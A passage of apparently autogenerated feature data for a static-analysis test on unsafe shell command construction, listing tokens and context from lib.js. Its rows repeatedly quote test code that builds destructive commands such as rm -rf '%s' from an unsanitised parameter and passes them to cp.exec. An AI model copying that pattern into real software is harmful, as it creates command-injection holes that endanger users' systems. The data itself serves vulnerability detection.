name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:20 | util.format | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:20 | util.format | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:20 | util.format | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:20 | util.format | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:41 | exceptional return of util.fo ... , name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:41 | exceptional return of util.fo ... , name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:41 | exceptional return of util.fo ... , name) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:41 | exceptional return of util.fo ... , name) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:41 | exceptional return of util.fo ... , name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:41 | util.fo ... , name) | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:41 | util.fo ... , name) | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:41 | util.fo ... , name) | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:41 | util.fo ... , name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:41 | util.fo ... , name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:41 | util.fo ... , name) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:41 | util.fo ... , name) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:41 | util.fo ... , name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:41 | util.fo ... , name) | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:15:100:20 | format | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:15:100:20 | format | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:15:100:20 | format | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:15:100:20 | format | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:15:100:20 | format | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:22:100:34 | "rm -rf '%s'" | CalleeFlexibleAccessPath | util.format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:22:100:34 | "rm -rf '%s'" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:22:100:34 | "rm -rf '%s'" | calleeImports | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:22:100:34 | "rm -rf '%s'" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:22:100:34 | "rm -rf '%s'" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:22:100:34 | "rm -rf '%s'" | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:22:100:34 | "rm -rf '%s'" | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:22:100:34 | "rm -rf '%s'" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:22:100:34 | "rm -rf '%s'" | receiverName | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:37:100:40 | name | CalleeFlexibleAccessPath | util.format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:37:100:40 | name | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:37:100:40 | name | calleeImports | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:37:100:40 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:37:100:40 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:37:100:40 | name | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:37:100:40 | name | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:37:100:40 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:37:100:40 | name | receiverName | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:3 | cp | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:3 | cp | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:8 | cp.exec | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:8 | cp.exec | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:51 | cp.exec ... name)) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:51 | cp.exec ... name)) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:51 | cp.exec ... name)) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:51 | cp.exec ... name)) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:51 | cp.exec ... name)) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:51 | exceptional return of cp.exec ... name)) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:51 | exceptional return of cp.exec ... name)) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:51 | exceptional return of cp.exec ... name)) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:51 | exceptional return of cp.exec ... name)) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:51 | exceptional return of cp.exec ... name)) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:5:102:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:5:102:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:5:102:8 | exec | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:5:102:8 | exec | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:5:102:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:13 | util | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:13 | util | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:13 | util | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:13 | util | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:13 | util | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:20 | util.format | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:20 | util.format | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:20 | util.format | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:20 | util.format | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:20 | util.format | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:50 | exceptional return of util.fo ... , name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 